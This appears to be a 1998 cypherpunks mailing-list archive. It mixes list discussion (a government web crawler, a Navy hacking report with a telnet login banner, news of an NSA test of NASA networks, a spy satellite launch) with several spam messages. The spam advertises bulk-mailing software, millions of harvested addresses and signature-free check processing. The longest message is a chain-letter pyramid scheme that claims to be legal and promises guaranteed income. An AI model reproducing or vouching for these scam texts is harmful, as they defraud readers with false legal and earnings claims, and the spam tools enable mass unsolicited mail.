>"realistic job preview."
>
>"It was widely believed that applicants may have been misled to believe
>that the job entailed more sophisticated and responsible police functions
>than actually take place," according to the report. "Boredom and lower
>levels of job satisfaction are believed to be widespread amongst the more
>educated [officers]."
>
>Sun staff writer Larry Carson contributed to this article.
>
>Originally published on May 8 1998


**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     subscribe ignition-point email@address
or
     unsubscribe ignition-point email@address
**********************************************

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: diane@extractorpro.net
Date: Sat, 9 May 1998 12:24:11 -0700 (PDT)
To: friend@bulkmailer
Subject: What Bill Gates doesn't want you to know.
Message-ID: <199805092253.SAA22521@sour.extractorpro.net>
MIME-Version: 1.0
Content-Type: text/plain




Microsoft is on to something that may in fact smash 
their competition with hours!

Bill Gates and his team of marketing VPs have finally
 found the net's biggest secret.  The one that Web Masters 
and Small Businesses have been using to get the lion's share 
of business out there.

You see, they all have found a way to reach more people 
than even all of Microsoft employs with the press of one 
button--  and at a cost that is less than you will probably 
spend on internet access this year.

Its called Direct Email and its already in the works with 
companies like Microsoft.  

Bill Gates' dream is already here with a secret piece of software 
called  "Extractor Pro".

Extractor Pro already does what Bill Gates is waiting to do!

Armed with Extractor Pro, a pentium computer, and a 28.8 modem 
you can be sending more messages in the time that it takes to 
change the oil in your car, than the entire NewYork post office 
can send in one day..

Thousands of simple Email messages like this could be your 
ticket to the moon.

If you want to be one up on Bill Gates and his team of 
marketing VPs, call us or visit:

http://www.extractorpro.net/~diane/

We'll throw you the keys to Extractor Pro  and let you take it for 
a test drive.  After you've gone around the block a few times and 
decided Extractor Pro can do for you what Bill Gates' latest plan 
can do for Microsoft-- call us and we can unlock your  Extractor 
Pro right over the net.


Thank you for your time.


Extractor Marketing
1-734-728-5210




   *********************************************************************
   *  The mailing list for this message has been pre-processed by an   *
   *  independent service to remove the addresses of those who are     *
   *  not interested in unsolicited email. Free registration for this  *
   *  removal service is at http://www.extractorpro.net                 *
   *                                                                                               *
   *********************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: your.friend@02433.com
Date: Sat, 9 May 1998 20:40:08 -0700 (PDT)
To: notme@idvu.es
Subject: hello
Message-ID: <99902170875.bee08056@tecrets.com>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
Hey come look at your new car stereo at Stereo Surplus!
http://www.cvc.net/business/juanm/index.html

HELLO MY NAME IS ARON.  WOULD YOU LIKE TO SEND EMAILS LIKE THIS?
I CHARGED $120.00 TO SEND THIS EMAIL!  YOU COULD MAKE LOTS OF
MONEY EVERY DAY AT THE PUSH OF A BUTTON.  DOES THAT SOUND EASY?
WELL IT IS!  FOR ONLY $180.00 YOU CAN HAVE STEALTH PLUS 40 MILLION
EMAIL ADRESSES.  THIS SAME PROGRAM SELLS EVERY WHERE ELSE FOR 
$400-500.00!  YOU CAN MAKE $400-800.00 A DAY! I ONLY DO THIS FOR ABOUT
2 HOURS AND WAIT FOR THE MONEY TO COME IN. THE BEST PART ITS ALL 
LEGAL!  ARE YOU INTERESTED?
EMAIL ME AT aron28@hotmail.com I WILL REPPLY ASAP!


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: a.friend@15234.com
Date: Sat, 9 May 1998 22:07:55 -0700 (PDT)
To: hello@idvu.es
Subject: hello
Message-ID: <75322170875.bee08056@allrets.com>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
Hey come look at your new car stereo at Stereo Surplus!
http://www.cvc.net/business/juanm/index.html

HELLO MY NAME IS ARON.  WOULD YOU LIKE TO SEND EMAILS LIKE THIS?
I CHARGED $120.00 TO SEND THIS EMAIL!  YOU COULD MAKE LOTS OF
MONEY EVERY DAY AT THE PUSH OF A BUTTON.  DOES THAT SOUND EASY?
WELL IT IS!  FOR ONLY $180.00 YOU CAN HAVE STEALTH PLUS 40 MILLION
EMAIL ADRESSES.  THIS SAME PROGRAM SELLS EVERY WHERE ELSE FOR 
$400-500.00!  YOU CAN MAKE $400-800.00 A DAY! I ONLY DO THIS FOR ABOUT
2 HOURS AND WAIT FOR THE MONEY TO COME IN. THE BEST PART ITS ALL 
LEGAL!  ARE YOU INTERESTED?
EMAIL ME AT aron28@hotmail.com I WILL REPPLY ASAP!


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 9 May 1998 19:04:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: corvette.bxa.doc.gov followup
In-Reply-To: <Pine.LNX.3.96.980509160534.13731A-100000@localhost>
Message-ID: <v04003a0bb17ab975db79@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain


I talked to Peter Cassidy yesterday.

We talked about corvette. For the record, they don't deny it's theirs, and
that it's part of their ongoing enforcement operations.

Maybe it's time to fire up your spider traps, boys and girls? I do know
that Los Alamos had one up for fun a few years ago. It was discussed on
this list about the time AltaVista got started, maybe 3 years ago...

I bet that corvette doesn't give a squalling fuck about "no-crawling" HTML
requests...

Anyone want to bet on how long it'll be some idiot in DC tries to make
spidertraps illegal?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spam the President <president@whitehouse.gov>
Date: Sat, 9 May 1998 17:11:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: U.S. Navy caught hacking into British marine charity Web site
Message-ID: <3554E2BF.5C3E2646@whitehouse.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 May 1998, Bill Frantz wrote:

> At 4:48 AM -0800 5/9/98, Spam the President wrote:
> >http://www.infoworld.com/cgi-bin/displayStory.pl?98058.winavy.htm
> >
> >  U.S. Navy caught hacking
> >  into British marine
> >  charity Web site
> >
> >  By Kristi Essick
> >  InfoWorld Electric
> >
> >  Posted at 3:07 PM PT, May 8, 1998
> >  ...
> >
> >  "I think whoever it was within the U.S. Navy
> >  facility would have better things to do rather than
> >  try and hack into our computers," said Chris
> >  Stroud, the organization's director of campaigns,
> >  in a statement. "If they were seeking reports on
> >  the Black Sea, we shall be freely publishing these
> >  in the near future anyway."
>
> Consider the possibility that someone hacked into the Navy's computer and
> then used it as a base to hack the Marine Mammal Charity site.
>
> -------------------------------------------------------------------------
> Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
> (408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
> frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA

It wouldn't make any sense. Why would a hacker use a military
site that is actively monitored to hack into a site with less security?

And why the requests to get the document originating from the same
source?

Also, from what I have read, the DoD needs come first in everything,
especially Defence Security related issues. No holds barred when they
want something.

This sounds exactly like the kind of information that they would 
want and consider essential, and could thus justify themselves to
get it by any means available. 

Of course, if this was a hacker playing tricks to the US military,
then I'm sure we can expect the military will publish this serious
a security breach, in order to get more money to protect themselves
against any Internet terrorist attacks in the future.

But I bet there will be no public comments or explanation given.
-----
pentagon-gw-e0.nci.net (198.253.200.2)
donhq-gw.nci.net (198.253.203.11)  
donhqns1.hq.navy.mil (164.224.250.80) 

Trying 164.224.250.80...
Connected to 164.224.250.80.
Escape character is '^]'.
    W A R N I N G     W A R N I N G     W A R N I N G     W A R N I N G

    USE OF THIS OR ANY OTHER DOD INTEREST COMPUTER SYSTEM CONSTITUTES A
                    CONSENT TO MONITORING AT ALL TIMES

This is a Department of Navy (DON) interest computer system.  All DON
interest
computer systems and related equipment are intended for the
communication,
transmission, processing, and storage of official U.S. Government or
other
authorized information only.  All DON interest computer systems are
subject
to  monitoring at all times to ensure proper functioning of equipment
and
systems including security devices and systems, to prevent unauthorized
use
and violations of statutes and security regulations, to deter criminal
activity, and for other similar purposes.  Any user of a DON interest
computer
system should be aware that any information placed in the system is
subject
to monitoring and is not subject to any expectation of privacy.

If monitoring of this or any other DON interest computer system reveals
possible evidence of violation of criminal statutes, this evidence and
any
other related information, including identification information about
the
user, may be provided to law enforcement officials.

If monitoring of this or any other DON interest computer system reveals
violations of security regulations or unauthorized use, employees who
violate
security regulations or make unauthorized use of DON interest computer
systems are subject to appropriate disciplinary action.

    USE OF THIS OR ANY OTHER DOD INTEREST COMPUTER SYSTEM CONSTITUTES A
                    CONSENT TO MONITORING AT ALL TIMES

    W A R N I N G     W A R N I N G     W A R N I N G     W A R N I N G

Username:




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spam the President <president@whitehouse.gov>
Date: Sat, 9 May 1998 17:23:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NASA computers to be hacked
Message-ID: <3554E57C.36AA4BFE@whitehouse.gov>
MIME-Version: 1.0
Content-Type: text/plain


http://www.msnbc.com/news/164582.asp

              NASA computers to be 'hacked'

              National Security Agency wants to know if space agency's
              computers are secure enough to fend off cyber-intruders
                                                         ASSOCIATED
PRESS

              WASHINGTON, May 9 - Agents from the National Security
              Agency will try to break into NASA's computers to
determine
              whether the space agency can fend off cyber-intruders who
              could threaten launch-control and other critical
operations, the
              trade publication Defense Week reports.


                     THE "PENETRATION STUDY" of the National

                      Aeronautics and Space Administration's
unclassified computer
                      networks is an effort to learn how easily
troublemakers can get
                      to sensitive data and what NASA's doing about it.
                             Teams from the intelligence agency will
soon try to
                      penetrate NASA networks in up to eight states,
said the
                      newsletter in the edition to be published Monday.
                             Last June, NSA "hackers" showed they could
cripple
                      Pacific Command battle-management computers and
U.S.
                      electric power grids.
                             
                      'PENETRATION STUDY'
                             The NASA "penetration study," which will be
run under the
                      auspices of the General Accounting Office, stands
out because
                      it involves a U.S. civilian agency, and such
operations are
                      barred by the 1952 law that created NSA, the
newsletter said. 
                   
     

                             However, the law barring domestic
activities contains an
                      exception if the spy agency is invited to do the
work.
                             Still, the publication said the planned
test raised questions of
                      privacy.
                             John Pike of the Federation of American
Scientists, a
                      veteran observer of both NASA and the intelligence
                      community, told the newsletter that the NASA test
breaks new
                      ground and bears close watching.
                             "This is the next big step in NSA's
expanding role in
                      domestic information security," he said. "It's
certainly the first
                      reported major initiative of this sort with
respect to a
                      non-military agency. While a number of safeguards
are in
                      place, there are concerns about the potential for
abuse of this
                      type of activity."
                             But Charles Redmond, the space agency's
manager of
                      information-technology security, said the test was
"not an
                      invasion of privacy."
                             NASA preferred to have the intelligence
agency do the
                      tests because it wanted to protect security and
proprietary data
                      and to avoid any conflict of interest, Redmond
said.
                             The tests will determine how easy it is to
access sensitive
                      sites and whether they can be accessed through the
Internet.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spam the President <president@whitehouse.gov>
Date: Sat, 9 May 1998 17:52:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Spy Satellite Launched
Message-ID: <3554EC42.5E33D640@whitehouse.gov>
MIME-Version: 1.0
Content-Type: text/plain


http://www.abcnews.com/sections/science/DailyNews/rocket980508.html

                         C A P E   C A N A V E R A L,  Fla.,  May 8 - A
top
                         secret spy satellite blasted off on
                         Friday atop the U.S. military's most
                         powerful rocket booster. 
                              The 20-story U.S. Air Force Titan 4B
                         rocket, carrying the classified National
                         Reconnaissance Office spacecraft, lifted off
its
                         Cape Canaveral launch pad at 9:38 p.m. EST.
                              The rocket's comet-like streak through the
                         moon-lit night sky was visible as far away as
                         Orlando.
                              According to the trade journal Aviation
                         Week and Space Technology, the Titan, built by
                         Lockheed Martin Corp., placed an electronic
                         eavesdropping satellite into orbit.
                              "It will be used to listen in on
                         communications in hostile areas, such as the
                         Middle East and North Korea," said Craig
                         Covault, the magazine's space technology
                         editor.
                              The rocket soared into the sky several
hours
                         late after a problem-plagued countdown. Air
                         Force launch controllers had to deal with
                         technical trouble at a tracking station and
high
                         upper-level winds.
                              The countdown was also disrupted by a
                         container ship and a small sail boat that
strayed
                         into the launch danger area in the Atlantic
                         Ocean, east of Cape Canaveral.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: csvcjld@nomvs.lsumc.edu
Date: Sun, 10 May 1998 05:27:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: corvette.bxa.doc.gov followup
Message-ID: <19980510072523421@nomvs.lsumc.edu>
MIME-Version: 1.0
Content-Type: text/plain


192.239.70.124 hit my ftp site on 4/13/98, the day after I announced a
program to crack simple substitution ciphers on this list.  When I
announced the program, I accidently gave it an .exe extension (when it
actually had a .zip extension).  192.239.70.124 tried to get the .exe
extension and then gave up.  Is it possible that 192.239.70.124 is
driven by http://infinity.nus.sg/cypherpunks?

I've since purchased a $10 article from the ACM and extended my program
to implement G.W.Hart's algorithm; the result is archived as
ftp://colbleep.ocs.lsumc.edu/pub/crypto/simplsub/win95/gwhart.zip.  C
source code is included; it should compile under Unix as well as Windows
95/NT.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: global202@yahoo.com
Date: Mon, 11 May 1998 03:02:44 -0700 (PDT)
To: Friend@public.com
Subject: The Internet Success ToolBox
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Note:We do not wish to send e-mail to anyone that does
not want it so please send an e-mail to:
remove98@yahoo.com
You will be removed promptly.
*****************************************************************

"THE INTERNET SUCCESS TOOLBOX"
The Most Complete Marketing Software Package Available Anywhere!

This is what you will receive on  CD-ROM:

1. Submit Spider Software - Professional Version ($99.90 value) - 
The new and improved version just released. Created specifically 
to meet the needs of those who  want their web pages to get 
NOTICED and placed in the TOP of the Search   Engines! This 
software automates  the process of submitting your site and 
uses powerful technology to get your site listed in the TOP positions.

2. Stealth Mass Mailer ($399.00 value) - This unique, first of 
it's kind - software that allows you to easily send 250,000 e-mail 
messages an hour. Simply enough by making a single 
connection to the Internet using a standard modem, and connecting to
either 20 different mail servers, or a single mail server 20 times.

This, easy to use, software is designed for the basic computer 
user to understand. It's as easy as imputing the mail server, 
selecting the list of e-mail recipients to send to, inserting your 
e-mail address, adding your subject line, selecting your sales 
letter, and pressing send.

3. E-Mail Pro Extractor ($350.00 value) - This one of a kind software 
program is designed to manage and clean up any list of e-mail
addresses. It will purge duplicates, manage removes and delete
undeliverables. It will also separate and categorize your list of 
e-mail addresses by domain names.

The E-mail Pro Version 4.0 Bulk E-mail Loader also imports simple
text files that anyone can download from AOL, CompuServe, the
Internet, etc...These text files contain classified ads, forum 
messages, or data from the member directory. Each of these 
files are filled with e-mail addresses.

4. Check Deposit System ($125.00 value) - Check Deposit System 
Version 2.1 is a state of the art, revolutionary software that allows
you to easily and legally process checks by fax, phone or Internet.
The customer's signature on the check is not necessary. 

5. 16 Million E-mail Addresses ($149.00 value) - We took a total of 
over 92 million e-mail addresses from many of the touted CD's that 
are out there (bought them all - some were $300+)! We added the 
millions we had in storage to those. When we combined them all, 
we had in excess of 100+ million addresses in one huge file.

We then ran a super "sort/de-dupe" program against this 
huge list. It cut the file down to less than 25 million!! 

We then ran a program that contained 150+ keywords to 
remove addresses with vulgarity, profanity, sex-related 
names, postmaster, webmaster, flamer, abuse, spam, 
etc...Also we  eliminated all .edu, .mil., org., gov., etc...
After that list was run against the remaining list, it
reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of 
dollars buying all others that are out there on  CD. Using
ours will be like using the 100+ million that we started with, 
but a lot less money and a lot less time!

If you order "The Internet Success Toolbox" for $395.00
within the next 7 days, you'll also receive the following 
awesome bonuses absolutely FREE. 
A value of over $600.00 !!!

To order: 

____ YES!  I'm bursting with anticipation!  Please send me "The 
Internet Success Toolbox" so I can start advertising my business to 
"millions of people" - absolutely FREE!  I'm anxious to see how others 
are creating immediate "cash-flow explosions", and eliminating most of  
their advertising and marketing costs - and how I can do the same!  
Enclosed is $395.

____ YES AGAIN!  Because I'm responding within 7 days, I will receive 
6 BONUSES with a total value of $663.90 - absolutely FREE!  They include: 

BONUS #1 ($39 value): "Search Engine Secrets" - Discover the Most 
Powerful and Proven Strategies that really work to place you at the Top of
the Search Engines!

BONUS #2 ($195 value): A FREE one year subcription to "The Internet
Success Toolbox Newsletter" - my ticket to marketing and 
internet cash flow heaven!  

BONUS #3 ($39.95 value): Your Hotline List of "7000 Free Classified 
Ad Sites on the Internet" - a virtual GOLDMINE!  

BONUS #4 ($19.95 value): A FREE Special Report titled "How to Put Your 
Business on Automatic Pilot and Turn Your Marketing System Into a 
Predictable, Turnkey, Cash-Flow Machine That Keeps on Working - Even 
When You Don't!!"  
									
BONUS #5 ($195 value): Unlimited technical support.  Even though 
"The Internet Success Toolbox"  will be simple to use, it's great to 
know support is always available - if and when you really need it!  
And last but not least . . . .

BONUS #6 ($175 value): Order within 7 days and I'll also throw in a 
FREE VACATION CERTIFICATE good for 3 days and 2 nights of FREE 
lodging at one of over 30 "premier" resorts.

Some vacation spots you can choose from include: Hawaii; Orlando, 
FL; Las Vegas; Atlantic City; Palm Springs; Aruba - in the South Carribean;
Cancun, Mexico; and many, many more!

Hey, when you start making a TON of money, you'll wanna do some 
celebrating, won't you? So start packing those bags!

That's it. A lot more than you bargained for isn't it?

When you total all the goodies up, you're looking as a total value of 
$663.90! All yours - absolutely FREE - with your purchase of our amazing
 package  "The Internet Success Toolbox " for only $395.00.

And I'll even pay for shipping your package. You can have it in days. And 
start making money THE VERY SAME DAY!

Anyway, I have a copy right here on my desk reserved for you. All I need 
is your go ahead and I'll rush it out to you along with your 6 FREE BONUSES.								

 Name _____________________________________________________

Street Address ____________________________________________

City)__________________State_______Zip_____________


Phone # (_____) ___________________________  

Fax # (______) _____________________

E-mail Address _________________________


___Visa  ___MasterCard

Total:$________

Account Number_____________________

Expiration Date____________________


I understand that all sales are final.


____________________________________
           Signature


To order by check:
***********************************************************

Tape or paste your check here
Fax it to us at: (425)379-9722
You do not need to send a hard copy of your check.
The fax is all we need.

(We are able to perform this service using our
Check Deposit System Software)

************************************************************


* Orders by Credit Card are shipped IMMEDIATELY.
  Fax completed order form to: (425) 379-9722

* Orders by personal, business or credit card CHECK are shipped in 7-10 
  business days.

* Orders MAILED IN or OVERNIGHTED with CASHIER'S CHECK  or MONEY ORDER are
  shipped IMMEDIATELY. Mail to: 
                       SYS
                       11014 19th Ave SE Suite 305 
                       Everett, WA 98208.
    
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 


									





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 83398.advsr@msn.com
Date: Sun, 10 May 1998 15:55:25 -0700 (PDT)
Subject: The information as requested -40730
Message-ID: <199805102254.PAA21804@toad.com>
MIME-Version: 1.0
Content-Type: text/html



***THIS IS NOT SPAM***
My name is Dan.  I make a habit of deleting mail I have not read, as I'm sure you do.  Please read this one though, you might find this interesting.
     I recently lost my high paying job from a major computer corporation due to their loss of a major contract.  They messed up, but that whole department of 15 people including myself are hung out to dry.  Corporate America at it's finest.  I have not had luck yet finding another job, as my skills were very specific to that company and not really worth anything to another company.
During the time I worked there, I also bought and sold Real Estate like those guys on TV (yes, you can do that and make it work for you).  The key is I made it work.  I was fairly successful until the "nightmare on Pleasant St." as my friends and I call it....
I lost money in one bad deal and I was no longer financially secure and I relied heavily on my income from my FORMER JOB.
As you've already heard, I lost that too and I started to look for other things I could do to make money until I could get back on my feet.  So I started to read all of the JUNK that was mailed to me.  Let me tell you, I can't believe some of the things out there... what a waste of time.
Until I saw this.
Hold on, I know you are (like I was) ready to stop right here.
     I implore you not to.
I, like you am NOT some non-educated fool.
I have made a lot of money for myself in Real Estate, which is not an easy business, and I am a rather competent business man.
At least finish reading this to the end.
      **BETTER STILL; PRINT THIS LETTER AND READ IT IN
         COMFORT, OVER AND OVER
                        Here is what I saw...
                *I only needed $20 dollars to try this
                *This is making money for people who at least tried
                  a little, so why not me too?
In desperation, I sent the four 5 dollar bills and got the reports.
As I always have, I MADE this work for me too.
I took much time and effort to learn about email (which is a great and FREE tool!!) and how to send lots of it. 
Now, 19 days after my first mailing of this, I have received roughly 8,450 responses (trust me, when my wife saw 8,450 5 dollar bills on the kitchen table, she no longer laughed at me for trying this).
I wrote a report of my own showing step by step how to do the same, which I will give you for free as a helping hand so we can all continue this success.  I will show you every step of cutting, pasting, and editing this letter to include your name and address, etc.
Here is my special offer to help you...As long as my address, DDW at the Colorado Springs PO Box is on the list below I will send the step-by-step instructions and 100,000 email addresses to anyone  who orders any report from me.  It took some time and expense to put this list of addresses together so all I ask is that you add another $5 for handling the addresses.  THE INSTRUCTIONS FOR E-MAILING ARE FREE.  They will come to you in a .txt format (which I will teach you how to use in the instructions I've put together) and less than 2% will be duplicates.  You will get the list of addresses with your report.  The first 160 people who order a report from me will receive a different set of addresses.  This is my gift to you to help you get started...
     I promise you, if you follow the directions in this e-mail and be prepared to eventually set aside about an hour each day to follow up (and count your money!), you will make at least as much money as I am.  You don't need to be a whiz at the computer, but you probably already are.  If you can open an envelope, remove the money and send an e-mail message, then you're on your way to the bank.  Take the time to read this so you'll understand how easy it is.  If I can do this, so can you!
     ADD THIS E-MAIL TO YOU 'FAVORITE PLACES' FOLDER
     SO THAT YOU WILL HAVE A COPY OF THIS FOR FUTURE USE.
                     GO FOR IT NOW!!
                     Dan
The following is a copy of the e-mail I read:
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
This is a legal money making PHENOMENON
PRINT this letter, read the directions, THEN READ IT AGAIN!!!
     
     You are about to embark on the most profitable and unique program you may ever see.  Many times over, it has demonstrated and proven its ability to generate large amounts of cash.  This program is showing fantastic appeal with a huge and ever-growing on-line population desirous of additional income.
This is a legitimate, LEGAL, money-making opportunity.  It does not require you to come in contact with people, do any hard work, and best of all, you never have to leave the house, except to go to the bank!
This truly is that lucky break you've been waiting for!  Simply follow the easy instructions in this letter, and your financial dreams will come true!  When followed correctly, this electronic, multi-level marketing program works perfectly...100% EVERY TIME!
THOUSANDS of people have used this program to:
    -Raise capital to start their own business
    -Pay off debts
    -Buy homes, cars, etc.,
    -Even retire!
This is your chance, so don't pass it up!
OVERVIEW OF THIS
EXTRAORDINARY
ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
___________________________________________
_____
Basically, this is what we do:
  We send thousands of people a product for $5.00 that costs next to nothing to produce and e-mail.  As with all multi-level businesses, we build our business by recruiting new partners and selling our products.  Every state in the U.S. allows you to recruit new business online (via your computer). 
The products in this program are a series of four business and financial reports costing $5.00 each.  Each order you receive via "snail mail" will include:
     *$5.00 cash
     *The name and number of the report they are ordering
     *The e-mail address where you will e-mail them the report they ordered.
  To fill each order, you simply e-mail the product to the buyer.  THAT"S IT!  The $5 is yours!  This is the easiest  electronic business anywhere!
FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!
******INSTRUCTIONS******
This is what you MUST do:
1. Order all four reports shown on the list below (you can't sell them if you don't order them).
     *For each report, send $5 CASH, the NAME & NUMBER OF THE REPORT YOU ARE ORDERING,
      YOUR E-MAIL ADDRESS, and YOUR RETURN POSTAL ADDRESS (in case of a problem) to the
      person whose name appears on the list next to the report.
     *When you place your order, make sure you order each of the four
      reports.  You will need all four reports so that you can save them
      on your computer and resell them.
     *Within a few days you will receive, via e-mail, each of the four reports
      Save them on you computer so they will be accessible for you to send
      reports to the 1,000's of people who will order them from you.
2.  IMPORTANT- DO NOT alter the names of the people who are listed next to each report, or 
     their sequence on the list in any way other than is instructed below in steps "a" through
     "d" or you will lose out on the majority of your profits.  Once you understand the way this
     works, you'll also see how it doesn't work if you change it. Remember, this method has
     been tested, and if you alter it, it WILL NOT work.
     a. Look below for the listing of available reports.
     b.  After you've ordered the four reports, replace the name and address
          under REPORT#1 with your name and address, moving the one that was
          there down to REPORT#2.
      c. Move the name and address that was under REPORT#2 down to REPORT#3.
      d. Move the name and address that was under REPORT#3 down to REPORT#4.
      e. The name and address the was under REPORT#4 is removed from the list
           and has no doubt collected their 50 grand.
Please make sure you copy everyone's name and address ACCURATELY!!!
3.  Take this entire letter, including the modified list of names, and save it to your
     computer.  Make NO changes to the instruction portion of this letter.
4.  Now you're ready to start an advertising campaign on the WORLDWIDE WEB!
     Advertising on the WEB is very, very inexpensive, and there are HUNDREDS of FREE
     places to advertise.  Another avenue which you could use for advertising is e-mail
     lists.  You can buy these lists for under $20/2000 addresses or you can pay
     someone a minimal charge to take care of it for you.  BE SURE TO START YOUR AD
     CAMPAIGN IMMEDIATELY!
5.  For every $5 you receive, all you must do is e-mail them the report they ordered.
     That's it!  ALWAYS PROVIDE SAME DAY SERVICE ON ALL ORDERS!  This guarantees that the 
     e-mail THEY send out, with YOUR name and address on it, will be prompt because they
     can't advertise until they receive the report!
--------------------------------------
AVAILABLE REPORTS
--------------------------------------
***Order each REPORT by NUMBER and NAME***

Notes:
-ALWAYS SEND $5 CASH FOR EACH REPORT
-ALWAYS SEND YOUR ORDER VIA FIRST CLASS MAIL
-Make sure the cash is concealed by wrapping it in at least two sheets of paper
-On one of those sheets of paper, include: (a) the number & name of the report you are
  ordering, (b) your e-mail address, and (c) your postal address.
__________________________________________________________
REPORT #1 "HOW TO REORGANIZE YOUR TIME TO ACCOMIDATE A HOME BASED BUSINESS"
Order REPORT #1 from:
           DDW
           PO Box 76532
           Colorado Springs CO. 80970
(Add an additional $5 to cover handling the 100,000 e-mail addresses I will send you when you order any report from me.  Also note as well that you want the e-mailing instructions (which is free) sent to you.  When you move my address down, move this offer also.  It will help us all).
__________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND E-MAIL"
 
Order REPORT #2 from:
            Basqiuat
            PO Box 1963
            Evanston, IL 60204
__________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"
Order REPORT #3 from:
            A Basket Affair
            4505 Hamptonshire Drive
             Raleigh, NC  27613
__________________________________________________________
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"
Order REPORT #4 from:
            Macbye Enterprises
            835 W. Warner Rd.
            Gilbert, AZ  85233
__________________________________________________________
____________________________________
HERES HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
____________________________________

  Let's say you decide to start small just to see how well it works.  Assume your goal is to get 10 people to participate on your first level. (Placing a lot of free ads on the Internet will EASILY get a larger response)  Also assume that everyone else in YOUR ORGANIZATION gets ONLY 10 downline members.  Follow this example to achieve the STAGGERING results below.
1st level-your ten members with $5.................................$50
2nd level-10 members from those 10 ($5 x 100).............$500
3rd level-10 members from those 100($5 x 1,000)..........$5,000
4th level-10 members from those 1,000($5 x 10,000).....$50,000
               Total= $55,550
Remember friends, this assumes that the people who participate only recruit 10 people each.  Think for a moment what would happen if they got 20 people to participate!  Most people get 100's of participants!  THINK ABOUT IT!
Your cost to participate in this is practically nothing (surely you can afford $20).  You obviously already have an Internet connection and e-mail is FREE!!  REPORT #3 shows you the most productive methods for bulk e-mail and purchasing e-mail lists.  Some lists & bulk e-mail vendors even work on trade!
About 50,000 new people get online every month!
*****TIPS FOR SUCCESS*****
*  Treat this as YOUR BUSINESS!  Be prompt, professional and follow the 
    directions accurately.
*  Send for the four reports immediately so you will have them when the
   orders start coming in because:
   When you receive a $5 order, you must send out the requested product/report to comply with the U.S. Postal and Lottery Laws, Title 18, Sections1302 and 1341 or title 18, section 3005 in the U.S. Code, also code of Federal Regs. vol.16, Sections 255 and 436, which state that "a product or service must be exchanged for money received".
*  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.
*  Be patient and persistent with this program.  If you follow the instructions 
   exactly, the results WILL undoubtedly be SUCCESSFUL!
*  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!
*****YOUR SUCCESS GUIDELINE*****
Follow these guidelines to guarantee your success:
  If you don't receive 10 to 20 orders for REPORT #1 within two weeks, continue advertising until you do.  Then, a couple of weeks later you should receive at least 100 orders for REPORT #2.  If you don't, continue advertising until you do.  Once you have received 100 or more orders for REPORT #2, YOU CAN RELAX, because the system is already working for you and the cash will continue to roll in!
THIS IS IMPORTANT TO REMEMBER:
  Every time your name is moved down the list, you are placed in front of a DIFFERENT report.  You can KEEP TRACK of your PROGRESS by watching which report people are ordering from you.  If you want to generate more income, send another batch of e-mails and start the whole process again!  There is no limit to the income you will generate from this business!
Note: If you need help with starting a business, registering a business name, how income tax is handled, etc., contact your local office of the Small Business Administration (a federal agency) for free help and answers to questions.  Also, the Internal Revenue Service offers free help via telephone and free seminars about business taxes.
*******T E S T I M O N I A L S*******

     This program does work, but you must follow it EXACTLY!  Especially the rule of not placing your name in a different position, it won't work and you will lose potential income.  I'm living proof that it works.  It really is a great opportunity to make relatively easy money, with little cost to you.  If you do choose to participate, follow the program exactly and you'll be on your way to financial security.
    Sean McLaughlin,  Jackson, MS
